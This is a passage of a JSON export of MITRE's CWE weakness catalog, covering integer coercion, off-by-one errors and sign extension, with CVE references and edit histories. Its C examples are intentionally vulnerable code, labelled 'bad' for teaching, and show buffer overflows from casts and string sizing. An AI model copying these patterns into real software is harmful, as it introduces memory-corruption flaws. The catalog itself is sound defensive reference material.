Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"192":{"attr":{"@_ID":"192","@_Name":"Integer Coercion Error","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Integer coercion refers to a set of flaws pertaining to the type casting, extension, or truncation of primitive data types.","Extended_Description":"Several flaws fall under the category of integer coercion errors. For the most part, these errors in and of themselves result only in availability and data integrity issues. However, in some circumstances, they may result in other, more complicated security related flaws, such as buffer overflow conditions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Crash, Exit, or Restart"],"Note":"Integer coercion often leads to undefined states of execution resulting in infinite loops or crashes."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"In some cases, integer coercion errors can lead to exploitable buffer overflow conditions, resulting in the execution of arbitrary code."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Integer coercion errors result in an incorrect value being stored for the variable in question."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"A language which throws exceptions on ambiguous data casts might be chosen."},{"Phase":"Architecture and Design","Description":"Design objects and program flow such that multiple or complex casts are unnecessary"},{"Phase":"Implementation","Description":"Ensure that any data type casting that you must used is entirely understood in order to reduce the plausibility of error in use."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-21"},"Intro_Text":"The following code is intended to read an incoming packet from a socket and extract one or more headers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"DataPacket *packet;int numHeaders;PacketHeader *headers;sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet->headers;if (numHeaders > 100) {}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers);","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"ExitError(\\"too many headers!\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow."},{"attr":{"@_Demonstrative_Example_ID":"DX-23"},"Intro_Text":"The following code reads a maximum size and performs validation on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of \\"short s\\" is forced in this particular example, short int\'s are frequently used within real-world code, such as code that processes structured data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int GetUntrustedInt () {}void main (int argc, char **argv) {}","xhtml:div":[{"#text":"return(0x0000FFFF);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char path[256];char *input;int i;short s;unsigned int sz;i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s > 256) {}/* s is sign-extended and saved in sz */sz = s;/* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf(\\"i=%d, s=%d, sz=%u\\\\n\\", i, s, sz);input = GetUserInput(\\"Enter pathname:\\");/* strncpy interprets s as unsigned int, so it\'s treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = \'\\\\0\'; /* don\'t want CWE-170 */printf(\\"Path is: %s\\\\n\\", path);","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","",""],"xhtml:div":{"#text":"DiePainfully(\\"go away!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}}}],"xhtml:br":["",""]}},"Body_Text":"This code first exhibits an example of CWE-839, allowing \\"s\\" to be a negative number. When the negative short \\"s\\" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119)."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Integer coercion error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT02-C","Entry_Name":"Understand integer conversion rules"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT05-C","Entry_Name":"Do not use input functions to convert character data if they cannot handle all possible inputs"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"Exact"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 7: Integer Overflows." Page 119"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Sign Extension", Page 248"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"Within C, it might be that \\"coercion\\" is semantically different than \\"casting\\", possibly depending on whether the programmer directly specifies the conversion, or if the compiler does it implicitly. This has implications for the presentation of this entry and others, such as CWE-681, and whether there is enough of a difference for these entries to be split.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes, References"}]}},"193":{"attr":{"@_ID":"193","@_Name":"Off-by-one Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product calculates or uses an incorrect maximum or minimum value that is 1 more, or 1 less, than the correct value.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"617","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"170","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"off-by-five","Description":"An \\"off-by-five\\" error was reported for sudo in 2002 (CVE-2002-0184), but that is more like a \\"length calculation\\" error."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Instability"],"Note":"This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When copying character arrays or using character manipulation methods, the correct size parameter must be used to account for the null terminator that needs to be added at the end of the array. Some examples of functions susceptible to this weakness in C include strcpy(), strncpy(), strcat(), strncat(), printf(), sprintf(), scanf() and sscanf()."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-20"},"Intro_Text":"The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int i;unsigned int numWidgets;Widget **WidgetList;numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets > MAX_NUM_WIDGETS)) {}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf(\\"WidgetList ptr=%p\\\\n\\", WidgetList);for(i=0; i<numWidgets; i++) {}WidgetList[numWidgets] = NULL;showWidgets(WidgetList);","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Incorrect number of widgets requested!\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"WidgetList[i] = InitializeWidget();","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption."},{"Intro_Text":"In this example, the code does not account for the terminating null character, and it writes one byte beyond the end of the buffer.","Body_Text":["The first call to strncat() appends up to 20 characters plus a terminating null character to fullname[]. There is plenty of allocated space for this, and there is no weakness associated with this first call. However, the second call to strncat() potentially appends another 20 characters. The code does not account for the terminating null character that is automatically added by strncat(). This terminating null character would be written one byte beyond the end of the fullname[] buffer. Therefore an off-by-one error exists with the second strncat() call, as the third argument should be 19.","When using a function like strncat() one must leave a free byte at the end of the buffer for a terminating null character, thus avoiding the off-by-one weakness. Additionally, the last argument to strncat() is the number of characters to append, which must be less than the remaining space in the buffer. Be careful not to just use the total size of the buffer."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char firstname[20];char lastname[20];char fullname[40];fullname[0] = \'\\\\0\';strncat(fullname, firstname, 20);strncat(fullname, lastname, 20);","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"char firstname[20];char lastname[20];char fullname[40];fullname[0] = \'\\\\0\';strncat(fullname, firstname, sizeof(fullname)-strlen(fullname)-1);strncat(fullname, lastname, sizeof(fullname)-strlen(fullname)-1);","xhtml:br":["","","","","","",""]}}]},{"Intro_Text":"The Off-by-one error can also be manifested when reading characters from a character array within a for loop that has an incorrect continuation condition.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define PATH_SIZE 60char filename[PATH_SIZE];for(i=0; i<=PATH_SIZE; i++) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char c = getc();if (c == \'EOF\') {}filename[i] = getc();","xhtml:br":["","",""],"xhtml:div":{"#text":"filename[i] = \'\\\\0\';","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"for(i=0; i<PATH_SIZE; i++) {...","xhtml:br":""}}],"Body_Text":"In this case, the correct continuation condition is shown below."},{"Intro_Text":"As another example the Off-by-one error can occur when using the sprintf library function to copy a string variable to a formatted string variable and the original string variable comes from an untrusted source. As in the following example where a local function, setFilename is used to store the value of a filename to a database but first uses sprintf to format the filename. The setFilename function includes an input parameter with the name of the file that is used as the copy source in the sprintf function. The sprintf function will copy the file name to a char array of size 20 and specifies the format of the new variable as 16 characters followed by the file extension .dat.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int setFilename(char *filename) {}","xhtml:div":{"#text":"char name[20];sprintf(name, \\"%16s.dat\\", filename);int success = saveFormattedFilenameToDB(name);return success;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"However this will cause an Off-by-one error if the original filename is exactly 16 characters or larger because the format of 16 characters with the file extension is exactly 20 characters and does not take into account the required null terminator that will be placed at the end of the string."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0252","Description":"Off-by-one error allows remote attackers to cause a denial of service and possibly execute arbitrary code via requests that do not contain newlines.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0252"},{"Reference":"CVE-2001-1391","Description":"Off-by-one vulnerability in driver allows users to modify kernel memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1391"},{"Reference":"CVE-2002-0083","Description":"Off-by-one error allows local users or remote malicious servers to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0083"},{"Reference":"CVE-2002-0653","Description":"Off-by-one buffer overflow in function usd by server allows local users to execute arbitrary code as the server user via .htaccess files with long entries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0653"},{"Reference":"CVE-2002-0844","Description":"Off-by-one buffer overflow in version control system allows local users to execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0844"},{"Reference":"CVE-1999-1568","Description":"Off-by-one error in FTP server allows a remote attacker to cause a denial of service (crash) via a long PORT command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1568"},{"Reference":"CVE-2004-0346","Description":"Off-by-one buffer overflow in FTP server allows local users to gain privileges via a 1024 byte RETR command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0346"},{"Reference":"CVE-2004-0005","Description":"Multiple buffer overflows in chat client allow remote attackers to cause a denial of service and possibly execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0005"},{"Reference":"CVE-2003-0356","Description":"Multiple off-by-one vulnerabilities in product allow remote attackers to cause a denial of service and possibly execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0356"},{"Reference":"CVE-2001-1496","Description":"Off-by-one buffer overflow in server allows remote attackers to cause a denial of service and possibly execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1496"},{"Reference":"CVE-2004-0342","Description":"This is an interesting example that might not be an off-by-one.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0342"},{"Reference":"CVE-2001-0609","Description":"An off-by-one enables a terminating null to be overwritten, which causes 2 strings to be merged and enable a format string.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0609"},{"Reference":"CVE-2002-1745","Description":"Off-by-one error allows source code disclosure of files with 4 letter extensions that match an accepted 3-letter extension.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1745"},{"Reference":"CVE-2002-1816","Description":"Off-by-one buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1816"},{"Reference":"CVE-2002-1721","Description":"Off-by-one error causes an snprintf call to overwrite a critical internal variable with a null value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1721"},{"Reference":"CVE-2003-0466","Description":"Off-by-one error in function used in many products leads to a buffer overflow during pathname management, as demonstrated using multiple commands in an FTP server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0466"},{"Reference":"CVE-2003-0625","Description":"Off-by-one error allows read of sensitive memory via a malformed request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0625"},{"Reference":"CVE-2006-4574","Description":"Chain: security monitoring product has an off-by-one error that leads to unexpected length values, triggering an assertion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4574"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Off-by-one Error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-155"}},{"attr":{"@_External_Reference_ID":"REF-156"}},{"attr":{"@_External_Reference_ID":"REF-157"}},{"attr":{"@_External_Reference_ID":"REF-140","@_Section":"Chapter 7, "Buffer Overflow""}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, "Off-by-One Errors", Page 180"}}]},"Notes":{"Note":[{"#text":"This is not always a buffer overflow. For example, an off-by-one error could be a factor in a partial comparison, a read from the wrong memory location, an incorrect conditional, etc.","attr":{"@_Type":"Relationship"}},{"#text":"Under-studied. It requires careful code analysis or black box testing, where inputs of excessive length might not cause an error. Off-by-ones are likely triggered by extensive fuzzing, with the attendant diagnostic problems.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"194":{"attr":{"@_ID":"194","@_Name":"Unexpected Sign Extension","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs an operation on a number that causes it to be sign extended when it is transformed into a larger data type. When the original number is negative, this can produce unexpected values that lead to resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":["Read Memory","Modify Memory","Other"],"Note":"When an unexpected sign extension occurs in code that operates directly on memory buffers, such as a size value or a memory index, then it could cause the program to write or read outside the boundaries of the intended buffer. If the numeric value is associated with an application-level resource, such as a quantity or price for a product in an e-commerce site, then the sign extension could produce a value that is much higher (or lower) than the application\'s allowable range."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Avoid using signed variables if you don\'t need to represent negative values. When negative values are needed, perform validation after you save those values to larger data types, or before passing them to functions that are expecting unsigned values."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-23"},"Intro_Text":"The following code reads a maximum size and performs a sanity check on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of \\"short s\\" is forced in this particular example, short int\'s are frequently used within real-world code, such as code that processes structured data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int GetUntrustedInt () {}void main (int argc, char **argv) {}","xhtml:div":[{"#text":"return(0x0000FFFF);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char path[256];char *input;int i;short s;unsigned int sz;i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s > 256) {}/* s is sign-extended and saved in sz */sz = s;/* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf(\\"i=%d, s=%d, sz=%u\\\\n\\", i, s, sz);input = GetUserInput(\\"Enter pathname:\\");/* strncpy interprets s as unsigned int, so it\'s treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = \'\\\\0\'; /* don\'t want CWE-170 */printf(\\"Path is: %s\\\\n\\", path);","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","",""],"xhtml:div":{"#text":"DiePainfully(\\"go away!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}}}],"xhtml:br":["",""]}},"Body_Text":"This code first exhibits an example of CWE-839, allowing \\"s\\" to be a negative number. When the negative short \\"s\\" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-10887","Description":"Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10887"},{"Reference":"CVE-1999-0234","Description":"Sign extension error produces -1 value that is treated as a command separator, enabling OS command injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0234"},{"Reference":"CVE-2003-0161","Description":"Product uses \\"char\\" type for input character. When char is implemented as a signed type, ASCII value 0xFF (255), a sign extension produces a -1 value that is treated as a program-specific separator value, effectively disabling a length check and leading to a buffer overflow. This is also a multiple interpretation error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0161"},{"Reference":"CVE-2007-4988","Description":"chain: signed short width value in image processor is sign extended during conversion to unsigned int, which leads to integer overflow and heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4988"},{"Reference":"CVE-2006-1834","Description":"chain: signedness error allows bypass of a length check; later sign extension makes exploitation easier.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1834"},{"Reference":"CVE-2005-2753","Description":"Sign extension when manipulating Pascal-style strings leads to integer overflow and improper memory copy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2753"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Sign extension error"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Specific"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-161"}},{"attr":{"@_External_Reference_ID":"REF-162"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":[{"#text":"Sign extension errors can lead to buffer overflows and other memory-based problems. They are also likely to be factors in other weaknesses that are not based on memory operations, but rely on numeric calculation.","attr":{"@_Type":"Relationship"}},{"#text":"This entry is closely associated with signed-to-unsigned conversion errors (CWE-195) and other numeric errors. These relationships need to be more closely examined within CWE.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-05","Modification_Comment":"complete rewrite of the entire entry"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content 